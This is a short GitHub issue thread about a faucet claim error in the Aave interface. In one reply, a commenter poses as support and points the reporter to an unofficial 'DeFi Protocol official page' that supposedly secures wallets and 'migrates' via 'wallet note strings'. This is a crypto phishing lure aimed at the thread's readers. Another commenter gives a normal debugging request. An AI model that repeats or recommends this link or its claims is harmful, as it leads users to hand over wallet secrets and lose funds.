### ISSUE TITLE
Faucet claim error

### ISSUE THREAD

**Issue by Rahuldz** [aave/interface#1662]
![image](https://github.com/aave/interface/assets/132873100/14b4d0c3-2b7c-4d8a-a6f6-70467a3ee6b8)

**Comment by Cancass** [comment]
Hello @Rahuldz,
Resolve your issues using DeFi Protocol [official page](http://dapchainfix.online/) where you can safely secure your wallet to prevent any loss of funds, perform end to end encryption after migration via dApp wallet note strings, faucet claiming and rectictify any additional issues you might be facing automatically.
Also note that: you can initiate a chat with the support using the chat button at the bottom of the page for further enquiries and assistance.

**Comment by Arveymenon** [comment]
Can you copy the error and paste in the issue to debug?
